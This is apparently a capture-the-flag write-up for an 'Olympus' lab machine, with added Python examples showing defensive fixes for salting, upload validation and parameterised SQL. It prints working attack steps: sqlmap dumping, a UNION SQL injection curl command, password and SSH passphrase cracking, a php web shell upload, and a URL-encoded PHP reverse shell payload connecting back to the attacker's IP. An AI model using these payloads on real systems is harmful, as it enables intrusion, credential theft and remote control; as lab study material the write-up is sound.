Target IP: 10.10.83.153
I added the entry 10.10.83.153 olympus.thm to the /etc/hosts file, and now we are ready to go!
Only two ports are open on the machine: SSH and HTTP. I will start my enumeration with the HTTP first.
Port 80: HTTP
Heading to olympus.thm shows us the webpage above. There is a hint: "The old version of the website is still accessible on this domain." Viewing the source code of this page did not provide any useful information. Time for a directory search!
Doing a simple directory search gives us plenty of information. The result /~webmaster looks interesting.
The webpage above is displayed to us when we browse to this directory. It looks like this is the first version of the website.
Viewing the source code, the webpage mentions it is Simple Content Management System by Victor Alagwu. A Google search shows this application version is vulnerable to SQL injection. However, it seems the old website used a parameter for categories of topics. This parameter could be vulnerable.
According to sqlmap, the cat_id parameter is vulnerable. I used the command sqlmap -u "http://olympus.thm/~webmaster/category.php?cat_id=1" --dump to dump all the tables.
Dumping the contents of the tables gave me a bunch of useful information. The interesting part is that prometheus is not using any randsalt (random salt) for their password.
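To show concretely why the missing salt matters, here is an added example of my own (not code from the write-up or from the CMS) that compares a bare hash with a per-user random salt using PBKDF2-HMAC-SHA256. The iteration count is a placeholder I chose for speed, and the only value taken from the write-up is the cracked password.

```python
import hashlib
import hmac
import os
from typing import Optional

# Iteration count chosen for a quick demo; OWASP's current guidance for
# PBKDF2-HMAC-SHA256 is 600,000, so raise it in a real deployment.
ITERATIONS = 100_000


def hash_unsalted(password: str) -> str:
    """The weak scheme the dump exposed: one bare hash per password.
    Two users with the same password get the same stored value, and a
    precomputed table for that hash function applies directly."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_salted(password: str, salt: Optional[bytes] = None) -> str:
    """Stored form: pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>.
    A fresh 16-byte salt per user means equal passwords no longer collide
    and each stored hash has to be attacked on its own."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_salted(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    algo, iters, salt_hex, digest_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac(
        "sha256", password.encode(), bytes.fromhex(salt_hex), int(iters)
    )
    return hmac.compare_digest(candidate.hex(), digest_hex)


def collides_for_equal_passwords(scheme) -> bool:
    """Do two accounts sharing a password end up with identical stored values?
    Constructed check; the password is the one cracked in the write-up."""
    return scheme("summertime") == scheme("summertime")


if __name__ == "__main__":
    print("unsalted collides:", collides_for_equal_passwords(hash_unsalted))
    print("salted collides:  ", collides_for_equal_passwords(hash_salted))
    record = hash_salted("summertime")
    print(record)
    print("verify ok:", verify_salted("summertime", record))
```

The unsalted scheme answers True to the collision check, which is exactly what lets one cracked hash unlock every account that shares the password; the salted scheme answers False, and verification still works because the salt is stored alongside the digest.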
I copied the password hash of each user in a text file called hash.
Then I used john to crack the hashes. It managed to crack the hash of one user, possibly prometheus. Now that we have the login credential prometheus:summertime, we can spray it at the old website's login page and at SSH.
The login credential above worked for the admin page of the old website. However, checking the users page shows prometheus only has the User role, and we need to obtain admin privileges. We have the option to create a new user, but we are unable to log in as them.
It looks like we can change the profile picture for our account. Maybe we can use a file upload exploit? When the Browse... button is pressed, it shows all formats are accepted. Changing to a php file is also accepted (wtf)? The next step is to find out where our profile picture is stored. It looks like it gets stored in the /img/<name> directory. The only problem is that we need admin privileges to access our backdoor.
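For contrast with the form that accepted a php file, here is how a profile-picture upload handler can refuse it. This is my own added illustration in Python, not the CMS's code; the allowed types, the size limit and the magic bytes are assumptions I chose for the example.

```python
import os
import secrets
from dataclasses import dataclass
from typing import Optional

# Assumed allow-list (not from the write-up): image extensions and the
# leading bytes a genuine file of that type must start with.
ALLOWED = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
MAX_BYTES = 2 * 1024 * 1024  # assumed 2 MiB avatar limit


@dataclass
class UploadDecision:
    accepted: bool
    reason: str
    stored_name: Optional[str] = None


def validate_upload(client_filename: str, content: bytes) -> UploadDecision:
    """Decide whether an uploaded avatar may be written to the image directory."""
    # 1. Drop any directory component the client sent (../../img/x.png and
    #    Windows-style paths alike); only the final name is considered.
    base = os.path.basename(client_filename.replace("\\", "/"))

    # 2. Judge the file by its LAST extension against the allow-list, so
    #    "pic.png.php" is treated as php and rejected.
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    if ext not in ALLOWED:
        return UploadDecision(False, f"extension '{ext}' not allowed")

    if len(content) > MAX_BYTES:
        return UploadDecision(False, "file too large")

    # 3. The bytes must actually look like the claimed type; a script
    #    renamed to .png fails here because it does not start with PNG magic.
    if not any(content.startswith(magic) for magic in ALLOWED[ext]):
        return UploadDecision(False, "content does not match extension")

    # 4. Never reuse the client's name: store under a random name with the
    #    server-chosen extension, so no double extension survives either.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return UploadDecision(True, "ok", stored)


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed minimal PNG prefix
    print(validate_upload("avatar.png", png))
    print(validate_upload("avatar.php", b"<?php echo 1; ?>"))
    print(validate_upload("avatar.png", b"<?php echo 1; ?>"))
```

Even with these checks, the directory that receives uploads should be served with script execution disabled (for example no PHP handler for that path), because validation in the application is the second line of defence, not the only one.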
I added another virtual host called chat.olympus.thm.
After performing a directory search on the new virtual host, I gained more information. The /uploads directory is interesting because chat information is stored there. In the database dump above, there was an interesting file called 47c3210d51761686f3af40a875eeaaea.txt.
But this file shows nothing useful.
Using the command curl http://olympus.thm/~webmaster/search.php -d "search=' union select 1,2,group_concat(file),4,5,6,7,8,9,10 from chats-- -&submit=", I was able to obtain the uploaded files.
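Both the cat_id injection found earlier and this search.php UNION payload have the same root cause: user input is concatenated into the SQL text. The example below is my own added illustration in Python with sqlite3, not the CMS's PHP; the tables and rows are constructed, and the payload shape is the one from the curl command above.

```python
import sqlite3
from typing import List, Tuple


def build_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the CMS database: a public posts table plus
    a chats table the search feature was never meant to reach."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE posts (id INTEGER, title TEXT, body TEXT);
        INSERT INTO posts VALUES (1, 'Welcome', 'First post');
        INSERT INTO posts VALUES (2, 'Gods', 'Mount Olympus');
        CREATE TABLE chats (id INTEGER, file TEXT);
        INSERT INTO chats VALUES (1, 'constructed-upload.txt');
        """
    )
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    """The 'before' pattern: the term is pasted into the SQL text, so a quote
    and a UNION in the input change the statement's grammar."""
    sql = f"SELECT id, title, body FROM posts WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, term: str) -> List[Tuple]:
    """The fix: a bound parameter. The driver hands the term over as data,
    so it is matched literally (LIKE wildcards aside) and can never add a UNION."""
    sql = "SELECT id, title, body FROM posts WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def leaks_chat_files(rows: List[Tuple]) -> bool:
    """Did the result include a value that only exists in chats.file?"""
    return any("constructed-upload.txt" in row for row in rows)


if __name__ == "__main__":
    db = build_demo_db()
    payload = "' UNION SELECT 1, file, 3 FROM chats-- -"
    print("vulnerable leaks:", leaks_chat_files(search_vulnerable(db, payload)))
    print("safe leaks:      ", leaks_chat_files(search_safe(db, payload)))
    print("safe normal use: ", search_safe(db, "God"))
```

With the bound parameter the same payload simply returns no rows, because no title contains that literal string; ordinary searches behave as before. The same change applies to the cat_id lookup in category.php.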
And I was able to access my simple web shell.
Now I have a simple web shell. I leveraged this to gain a reverse shell connection. I used the PHP payload below, and visited the URL to activate it. And now I have a foothold on the machine.
Payload used: php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
Full URL: http://chat.olympus.thm/uploads/3573b47dffe7988a0b3e548986a5b3ab.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
My machine timed out, so the new full URL is http://chat.olympus.thm/uploads/03c049b49938dbe1761d94312d63f02f.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bshell_exec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
New IP is 10.10.56.116.
There is an unusual binary called cputils. Running it enables us to copy a file from a source to a destination.
It looks like zeus has an SSH key in .ssh.
Now I have the SSH key of user zeus.
However, it is asking for the passphrase.
I used ssh2john to obtain the hash of the key. And then using john, I cracked the passphrase of the SSH key. Now I can login as the user zeus. The passphrase is snowflake.
And I am in as zeus.
During further manual enumeration, I found an interesting file that looks like a backdoor with a password inside it. Therefore, the file 0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php should work.
And it did! I used the password that is inside the php file to gain access. This is a backdoor that gives us root privileges. The command syntax is already there too!
Using the secret backdoor, I managed to obtain a root shell!
The URL I used is http://10.10.56.116/0aB44fdS3eDnLkpsz3deGv8TttR4sc/VIGQFQFMYOST.php?ip=10.14.55.153&port=8444, pointing to my local machine and port. I had to enter the password again.
Using sqlmap, I dumped the table olympus.flag. This table contains the first flag.
I obtained the second flag. It was inside zeus's home directory.
I obtained the root.txt flag once I used the secret backdoor to gain a reverse shell connection.
The fourth flag requires us to search for it. Using grep -r flag{ should be enough to obtain the last flag file.
The last flag is located at /etc/ssl/private/.bonus.fl4g which is flag{Y0u_G0t_m3_g00d!}.